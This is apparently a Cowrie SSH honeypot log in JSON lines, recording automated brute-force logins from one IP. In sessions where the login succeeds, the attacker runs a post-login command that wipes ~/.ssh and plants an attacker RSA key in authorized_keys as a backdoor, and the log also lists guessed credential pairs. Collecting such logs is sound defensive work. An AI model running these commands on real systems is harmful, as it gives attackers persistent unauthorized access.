{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:06:21.837563Z","src_ip":"212.227.235.229","session":"2a3893540cee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:06:22.580029Z","src_ip":"212.227.235.229","session":"2a3893540cee"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:23.758157Z","src_ip":"212.227.235.229","session":"2a3893540cee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50596,"dst_ip":"1.2.3.4","dst_port":22,"session":"36eb6dc17acf","protocol":"ssh","message":"New connection: 212.227.235.229:50596 (1.2.3.4:22) [session: 36eb6dc17acf]","sensor":"my-vps","timestamp":"2025-09-09T06:06:23.923888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:06:23.924646Z","src_ip":"212.227.235.229","session":"36eb6dc17acf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:06:24.097933Z","src_ip":"212.227.235.229","session":"36eb6dc17acf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:24.828686Z","src_ip":"212.227.235.229","session":"36eb6dc17acf"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:25.001866Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:25.003278Z","src_ip":"212.227.235.229","session":"36eb6dc17acf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64705,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a102e92a708","protocol":"ssh","message":"New connection: 212.227.235.229:64705 (1.2.3.4:22) [session: 0a102e92a708]","sensor":"my-vps","timestamp":"2025-09-09T06:06:32.912605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:06:32.913369Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:06:33.043270Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.login.success","username":"root","password":"Yq123456","message":"login attempt [root/Yq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:33.594788Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:33.913177Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:06:33.913834Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:06:33.914757Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.041755Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59895,"dst_ip":"1.2.3.4","dst_port":22,"session":"271fe48f6935","protocol":"ssh","message":"New connection: 212.227.235.229:59895 (1.2.3.4:22) [session: 271fe48f6935]","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.058140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.058919Z","src_ip":"212.227.235.229","session":"271fe48f6935"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.143747Z","src_ip":"212.227.235.229","session":"271fe48f6935"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:34.367502Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.368324Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.520827Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.521725Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.538782Z","src_ip":"212.227.235.229","session":"271fe48f6935"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64051,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd98610a7165","protocol":"ssh","message":"New connection: 212.227.235.229:64051 (1.2.3.4:22) [session: bd98610a7165]","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.643191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.644608Z","src_ip":"212.227.235.229","session":"bd98610a7165"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:06:34.787021Z","src_ip":"212.227.235.229","session":"bd98610a7165"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:06:35.376372Z","src_ip":"212.227.235.229","session":"bd98610a7165"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:35.624968Z","src_ip":"212.227.235.229","session":"271fe48f6935"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:36.500568Z","src_ip":"212.227.235.229","session":"bd98610a7165"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64748,"dst_ip":"1.2.3.4","dst_port":22,"session":"4384d3bd673f","protocol":"ssh","message":"New connection: 212.227.235.229:64748 (1.2.3.4:22) [session: 4384d3bd673f]","sensor":"my-vps","timestamp":"2025-09-09T06:06:36.628275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:06:36.629213Z","src_ip":"212.227.235.229","session":"4384d3bd673f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:06:36.761034Z","src_ip":"212.227.235.229","session":"4384d3bd673f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:37.310512Z","src_ip":"212.227.235.229","session":"4384d3bd673f"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:37.440358Z","src_ip":"212.227.235.229","session":"0a102e92a708"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:37.442326Z","src_ip":"212.227.235.229","session":"4384d3bd673f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57794,"dst_ip":"1.2.3.4","dst_port":22,"session":"822f20437758","protocol":"ssh","message":"New connection: 212.227.235.229:57794 (1.2.3.4:22) [session: 822f20437758]","sensor":"my-vps","timestamp":"2025-09-09T06:06:40.678797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:06:40.679554Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:06:40.920008Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.login.success","username":"root","password":"loulou","message":"login attempt [root/loulou] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:41.924532Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:42.429117Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:06:42.430071Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:06:42.431401Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:42.955269Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:43.261646Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:06:43.262362Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:06:43.505873Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:43.506935Z","src_ip":"212.227.235.229","session":"822f20437758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58810,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c2eba986e87","protocol":"ssh","message":"New connection: 212.227.235.229:58810 (1.2.3.4:22) [session: 6c2eba986e87]","sensor":"my-vps","timestamp":"2025-09-09T06:06:43.751989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:06:43.752896Z","src_ip":"212.227.235.229","session":"6c2eba986e87"}
